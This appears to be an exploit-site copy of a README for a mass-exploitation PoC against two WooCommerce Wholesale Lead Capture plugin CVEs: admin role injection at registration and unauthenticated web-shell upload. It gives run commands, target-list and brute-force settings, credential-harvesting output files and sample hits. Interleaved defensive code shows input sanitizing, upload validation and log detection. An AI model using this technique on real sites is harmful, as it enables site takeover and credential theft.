## https://sploitus.com/exploit?id=A1F514F0-9DB7-5283-8202-5C1C9F4B6A41
---
## Vulnerability Overview
### CVE-2026-27542: Unauthenticated Privilege Escalation
| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-27542 |
| **Severity** | **CRITICAL** (CVSS v3.1 score **9.8**) |
| **Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Affected Component** | WooCommerce Wholesale Lead Capture (WWLC) Plugin for WordPress |
| **Vulnerability Type** | Unauthenticated Privilege Escalation |
| **Authentication Required** | None |
| **CWE** | CWE-269: Improper Privilege Management |

**Description:**
The WooCommerce Wholesale Lead Capture plugin for WordPress is vulnerable to **Unauthenticated Privilege Escalation** in all known affected versions. The vulnerability exists within the `wwlc_create_user` AJAX action handler, which processes user registration requests without adequately sanitizing or validating user-supplied role fields. A remote, unauthenticated attacker can craft a specially formed POST request that injects arbitrary WordPress capability fields, including `wp_capabilities[administrator]`, directly into the user metadata at account-creation time. The attacker can therefore self-register as a WordPress administrator with no prior authentication and no interaction from a legitimate user, which amounts to complete compromise of the affected WordPress installation.
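What the handler should have done, as an added illustration that is not the plugin's code: the role and capability metadata of a self-registered user must be fixed server-side, and any request field that names a role or capability key has to be dropped before the account is created. The field allowlist, the `ALLOWED_ROLE` value and the sample request body are constructed for this example. WordPress prefixes the capabilities meta key with the site's table prefix (`wp_capabilities` on a default install), which is why the protected-key pattern does not hard-code `wp_`.

```python
"""Reference check for registration input (added example, not plugin code).

Shows the vulnerable pattern (every submitted field becomes user metadata)
beside the hardened one (allowlist the fields, drop role/capability keys,
assign the role from server-side configuration).
"""
import re
from urllib.parse import parse_qs

# Any key naming WordPress role/capability metadata, with or without a
# PHP-style array suffix such as [administrator]. The table prefix varies
# per site, so only the suffix of the meta key is matched.
PROTECTED_KEY_RE = re.compile(
    r'^(?:[a-z0-9_]*?capabilities|[a-z0-9_]*?user_level|roles?)(?:\[.*\])?$',
    re.IGNORECASE,
)

# Assumption: the role a new wholesale lead should receive on this site.
ALLOWED_ROLE = "subscriber"

# Constructed allowlist of the fields the registration form legitimately collects.
FORM_FIELDS = {"user_login", "user_email", "first_name", "last_name", "company_name"}

# Constructed x-www-form-urlencoded body: ordinary profile fields plus
# role/capability keys smuggled in alongside them, as the advisory describes.
SAMPLE_BODY = (
    "user_login=newlead&user_email=lead%40example.com&first_name=Sam"
    "&wp_capabilities%5Badministrator%5D=1&role=administrator"
)


def parse_form_body(body):
    """Decode a form body into {key: last_value}; bracketed keys are kept verbatim."""
    return {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}


def is_protected_key(key):
    """True for wp_capabilities[...], <prefix>_capabilities, wp_user_level, role, roles."""
    return PROTECTED_KEY_RE.match(key) is not None


def unsafe_build_user_meta(form):
    """The vulnerable pattern: whatever the client sent is stored as user meta."""
    return dict(form)


def safe_build_user(form):
    """Hardened pattern: allowlisted fields only, role fixed server-side.

    Returns (user_record, rejected_keys) so the caller can log what was dropped.
    """
    user = {k: v for k, v in form.items() if k in FORM_FIELDS}
    rejected = sorted(k for k in form if is_protected_key(k))
    user["role"] = ALLOWED_ROLE  # never taken from the request
    return user, rejected


if __name__ == "__main__":
    form = parse_form_body(SAMPLE_BODY)
    print("unsafe:", unsafe_build_user_meta(form))
    print("safe:  ", safe_build_user(form))
```

The two builders make the difference concrete: the unsafe one persists `wp_capabilities[administrator]` as metadata, the safe one returns it in `rejected` for logging and stores a subscriber record regardless of what the request asked for.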
---
### CVE-2026-27540: Unauthenticated Arbitrary File Upload
| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-27540 |
| **Severity** | **CRITICAL** (CVSS v3.1 score **9.8**) |
| **Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Affected Component** | WooCommerce Wholesale Lead Capture (WWLC) Plugin for WordPress |
| **Vulnerability Type** | Unauthenticated Arbitrary File Upload (leading to Remote Code Execution) |
| **Authentication Required** | None |
| **CWE** | CWE-434: Unrestricted Upload of File with Dangerous Type |

**Description:**
The WooCommerce Wholesale Lead Capture plugin for WordPress is vulnerable to **Unauthenticated Arbitrary File Upload** in all known affected versions. The vulnerability resides in the `wwlc_file_upload_handler` AJAX action, which is registered without any authentication or nonce verification requirement. By submitting a crafted multipart POST request to `/wp-admin/admin-ajax.php`, a remote unauthenticated attacker can upload files of arbitrary type, including PHP web shells, to the server's `wp-content/uploads/` directory under a dynamically generated `wwlc-temp-*` subdirectory. Successful exploitation leads to **Remote Code Execution (RCE)** on the underlying web server, with the attacker's code running as the web server process's user account.
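The checks an upload handler should run before writing anything under `wp-content/uploads`, as an added example that is not the plugin's code: reject executable extensions anywhere in the name (so `shell.php.jpg` fails as well as `shell.php`), require the file's leading bytes to match a small allowlisted extension set, and refuse content that carries script markers. The allowlist, the magic-byte table and the sample inputs are constructed; the closing Apache fragment is the folder-side mitigation of denying PHP files under the uploads tree, which limits impact even if a handler check is bypassed.

```python
"""Upload validation for a lead-capture form (added example, not plugin code)."""
import os
import re

# Constructed allowlist: extension -> acceptable leading bytes.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "pdf": (b"%PDF-",),
}

# Executable extensions are rejected wherever they appear in the name,
# so a double extension such as shell.php.jpg is caught too.
EXECUTABLE_RE = re.compile(
    r'\.(?:php\d*|phtml|phar|pht|phps|inc|cgi|pl|py|sh|htaccess)(?:\.|$)',
    re.IGNORECASE,
)

# Byte sequences that have no business inside an image or PDF upload.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def validate_upload(filename, data):
    """Return (ok, reason). ok is True only for an allowlisted, self-consistent file."""
    name = os.path.basename(filename.replace("\\", "/"))
    if name != filename or name.startswith("."):
        return False, "path component or dotfile in name"
    if EXECUTABLE_RE.search(name):
        return False, "executable extension"
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED:
        return False, f"extension not allowlisted: {ext!r}"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match extension"
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script marker inside file"
    return True, "ok"


# Folder-side mitigation (Apache 2.4 .htaccess for the uploads directory):
# even a file that slips past the handler is never executed from here.
UPLOADS_HTACCESS = """\
<FilesMatch "\\.(?:php\\d*|phtml|phar|pht)$">
    Require all denied
</FilesMatch>
"""


if __name__ == "__main__":
    # Constructed sample inputs.
    for fname, blob in [
        ("shell.php", b"<?php echo 1;"),
        ("shell.php.jpg", b"\xff\xd8\xff\xe0JFIF"),
        ("pic.jpg", b"\xff\xd8\xff\xe0JFIF"),
        ("catalog.pdf", b"%PDF-1.7 constructed"),
    ]:
        print(fname, validate_upload(fname, blob))
```

The extension check runs before the content check on purpose: a file is refused for its name alone, so an attacker gains nothing by pairing a dangerous name with a valid image header.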
---
## Tool Description
This is a **Proof-of-Concept (PoC)** exploitation script for the two critical vulnerabilities described above, targeting WordPress installations running the **WooCommerce Wholesale Lead Capture** plugin. The tool supports two independent attack modes:
| Mode | Attack Type | Goal |
|---|---|---|
| **Mode 1** | Unauthenticated Arbitrary File Upload + Brute-Force folder discovery | Upload a PHP web shell and locate it via multi-layer folder guessing |
| **Mode 2** | Unauthenticated Privilege Escalation via Registration | Self-register as WordPress Administrator and verify admin access |
---
## Requirements
### System Requirements
- Python **3.8** or higher
- Internet access to target(s)
- Linux / Windows / macOS
### Python Dependencies
```bash
pip install requests urllib3 colorama
```
Or install via requirements file:
```bash
pip install -r requirements.txt
```
**`requirements.txt`:**
```
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
```
---
## Installation
```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-27542-CVE-2026-27540.git
cd CVE-2026-27542-CVE-2026-27540
# Install dependencies
pip install -r requirements.txt
# Run the tool
python3 CVE-2026-27542_CVE-2026-27540.py
```
---
## Usage
### Basic Run
```bash
python3 CVE-2026-27542_CVE-2026-27540.py
```
The tool presents an interactive terminal interface. You will be prompted for all required parameters.
---
### Target List Format
Create a plain text file (e.g., `list.txt`) with one target URL per line:
```
https://target1.com
https://target2.com
http://target3.com/wordpress
```
---
### Mode 1: File Upload + Folder Brute-Force
```
Select mode [1=Upload+Folder, 2=Registration+Admin]: 1
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Shell file path [shell.php]: shell.php
Shell signature (marker inside shell) [Nx_SHELL_SIGNATURE]: Nx_SHELL_SIGNATURE
Max pattern-based folder guesses per site [50000]: 50000
Max time-based folder guesses per site [50000]: 50000
Max random-hex folder guesses per site [100000]: 100000
Upload results file [scan_results/wwlc_uploads.txt]: scan_results/wwlc_uploads.txt
Found shells file [scan_results/wwlc_shells_found.txt]: scan_results/wwlc_shells_found.txt
```
**Shell file example (`shell.php`):**
```php
```
> **Note:** The `wwlc-temp-*` folder is dynamically generated by the plugin using PHP's `uniqid('wwlc-temp-')`. The tool uses a multi-layer brute-force strategy to discover it:
>
> | Layer | Strategy | Description |
> |---|---|---|
> | 0 | Directory Listing | Attempts to list uploads directory if open |
> | 1 | Pattern-Based | Time-derived and sequential numeric guesses |
> | 2 | Time-Based Hex | Seeded by observed HTTP request timestamps |
> | 3 | Random Hex | Pure random hex string guessing |
---
### Mode 2: Registration + Role Injection + Admin Verification
```
Select mode [1=Upload+Folder, 2=Registration+Admin]: 2
Targets list file (one URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Base registration username (prefix) [Nx_admin]: Nx_admin
Base registration email [nx_admin@example.com]: nx_admin@example.com
Registration results file [scan_results/wwlc_register_results.txt]:
Admin hits file [scan_results/Admin_login.txt]:
```
The tool:
1. Discovers the WWLC registration form and extracts a valid nonce
2. Submits a crafted registration payload injecting `administrator` role
3. Attempts to log in with the created credentials
4. Verifies admin panel access across multiple WP admin endpoints
5. Saves confirmed admin hits to the output file
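Both modes leave a recognisable trace in ordinary web-server access logs: Mode 1's folder discovery produces a burst of 404s under `/wp-content/uploads/wwlc-temp-*/` followed by a 200 for a `.php` file there, and Mode 2 produces an `admin-ajax.php` POST, a `wp-login.php` POST and a successful `/wp-admin/` request from the same client within seconds. The detector below is an added example, not part of the PoC or the plugin; the Apache combined-format lines, the IP addresses, the threshold and the finding names are constructed, and the Mode 2 chain is a heuristic because a standard access log does not record which AJAX `action` a POST carried.

```python
"""Flag WWLC attack patterns in Apache combined-format access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
WWLC_TEMP_RE = re.compile(r'^/wp-content/uploads/wwlc-temp-[^/]+/')
PHP_RE = re.compile(r'\.php(?:[./]|$)', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec


def analyse(lines, brute_threshold=20, chain_window=timedelta(seconds=120)):
    """Return a sorted list of (client_ip, finding_name) tuples."""
    findings = set()
    notfound_per_ip = defaultdict(int)
    events_per_ip = defaultdict(list)

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, status = rec["ip"], rec["path"], rec["status"]
        events_per_ip[ip].append(rec)
        if WWLC_TEMP_RE.match(path):
            if status == 404:
                notfound_per_ip[ip] += 1          # folder-guessing noise
            elif status == 200 and PHP_RE.search(path):
                # PHP served from the plugin's temp upload folder: the
                # post-exploitation signature of CVE-2026-27540.
                findings.add((ip, "php_served_from_wwlc_temp"))

    for ip, count in notfound_per_ip.items():
        if count >= brute_threshold:
            findings.add((ip, "wwlc_temp_folder_bruteforce"))

    # Mode 2 shape: ajax POST -> login POST -> 200 under /wp-admin/,
    # same client, in order, inside chain_window.
    for ip, events in events_per_ip.items():
        events.sort(key=lambda r: r["ts"])
        for i, start in enumerate(events):
            if not (start["method"] == "POST" and start["path"] == "/wp-admin/admin-ajax.php"):
                continue
            saw_login = False
            for ev in events[i + 1:]:
                if ev["ts"] - start["ts"] > chain_window:
                    break
                if ev["method"] == "POST" and ev["path"] == "/wp-login.php":
                    saw_login = True
                elif (saw_login and ev["method"] == "GET" and ev["status"] == 200
                      and ev["path"].startswith("/wp-admin/")
                      and ev["path"] != "/wp-admin/admin-ajax.php"):
                    findings.add((ip, "ajax_register_then_admin_access"))
                    break
    return sorted(findings)


def _line(ip, ts, method, path, status, size="0", ua="python-requests/2.31.0"):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} {size} "-" "{ua}"'


# Constructed sample log: a Mode 1 style burst, a Mode 2 style chain, and benign traffic.
SAMPLE_LOG = [_line("203.0.113.7", "10/Mar/2026:12:00:01 +0000", "POST", "/wp-admin/admin-ajax.php", 200, "87")]
SAMPLE_LOG += [
    _line("203.0.113.7", f"10/Mar/2026:12:00:{sec:02d} +0000", "GET",
          f"/wp-content/uploads/wwlc-temp-{guess:08d}/shell_abc123.php", 404, "196")
    for guess, sec in zip(range(1, 26), range(2, 27))
]
SAMPLE_LOG += [
    _line("203.0.113.7", "10/Mar/2026:12:00:27 +0000", "GET",
          "/wp-content/uploads/wwlc-temp-00000123/shell_abc123.php", 200, "12"),
    _line("198.51.100.9", "10/Mar/2026:12:10:00 +0000", "POST", "/wp-admin/admin-ajax.php", 200, "45"),
    _line("198.51.100.9", "10/Mar/2026:12:10:01 +0000", "POST", "/wp-login.php", 302, "0"),
    _line("198.51.100.9", "10/Mar/2026:12:10:02 +0000", "GET", "/wp-admin/", 200, "51234"),
    _line("192.0.2.5", "10/Mar/2026:12:20:00 +0000", "GET", "/wp-content/uploads/2026/03/logo.png", 200, "3456", "Mozilla/5.0"),
]

if __name__ == "__main__":
    for ip, finding in analyse(SAMPLE_LOG):
        print(ip, finding)
```

If the server logs query strings or the AJAX `action` value (for example via a WAF or an application-level audit log), narrow the Mode 2 rule to POSTs carrying `wwlc_create_user` and the Mode 1 rule to `wwlc_file_upload_handler`; with only combined-format logs the chain above is the most specific signal available. The `php_served_from_wwlc_temp` finding is the one that warrants immediate response, since it means a PHP file is already being executed from the uploads tree.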
---
## Output Files
| File | Description |
|---|---|
| `scan_results/wwlc_uploads.txt` | All sites where file upload succeeded (Mode 1) |
| `scan_results/wwlc_shells_found.txt` | Full shell URLs that were confirmed accessible (Mode 1) |
| `scan_results/wwlc_register_results.txt` | All registration attempt results with credentials (Mode 2) |
| `scan_results/Admin_login.txt` | Confirmed admin login hits with credentials (Mode 2) |
### Sample Output (Mode 2: Admin Hit)
```
[INFO] Mode2 | Target: https://target.com
[SUCCESS] https://target.com | nonce found on /wholesale-register/: a1b2c3d4e5
[INFO] https://target.com | using discovered nonce
[SUCCESS] https://target.com | registration success for user=Nx_admin_x7k2
[SUCCESS] https://target.com | ADMIN login confirmed as Nx_admin_x7k2
```
### Sample Output (Mode 1: Shell Found)
```
[INFO] Mode1 | Target: https://target.com
[INFO] https://target.com | upload HTTP time: 0.847s
[SUCCESS] https://target.com | upload success file_name=shell_abc123.php
[INFO] https://target.com | pattern brute-force (50003 guesses)
[SUCCESS] https://target.com | shell FOUND via pattern: https://target.com/wp-content/uploads/wwlc-temp-00000123/shell_abc123.php
[INFO] https://target.com | folder scan stats: attempts=123, time=4.213s, rate=29.2 req/s
```
---
## Contact & Author
By: Nxploited (Khaled Alenazi)
---
## Legal Disclaimer
> **THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY RESEARCH PURPOSES ONLY.**
>
> The author, **Nxploited (Khaled Alenazi)**, and all contributors to this project **do not condone, support, or take any responsibility** for the misuse of this tool or any damage caused by the use of this software against systems for which you do not have explicit written authorization.
>
> - **Permitted:** Use on systems you own or have been granted explicit written permission to test.
> - **Prohibited:** Use against any systems without prior explicit written authorization from the system owner.
>
> **Unauthorized access to computer systems is illegal and punishable under applicable laws** including but not limited to the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act (CMA), and equivalent legislation worldwide.
>
> **By using this tool, you accept sole responsibility for your actions and confirm that you have the legal authority to test the targeted systems.**
>
> The author assumes **no liability** whatsoever for any direct, indirect, incidental, or consequential damages arising from the use or misuse of this software.
---
© 2026 Nxploited (Khaled Alenazi). For authorized security research only.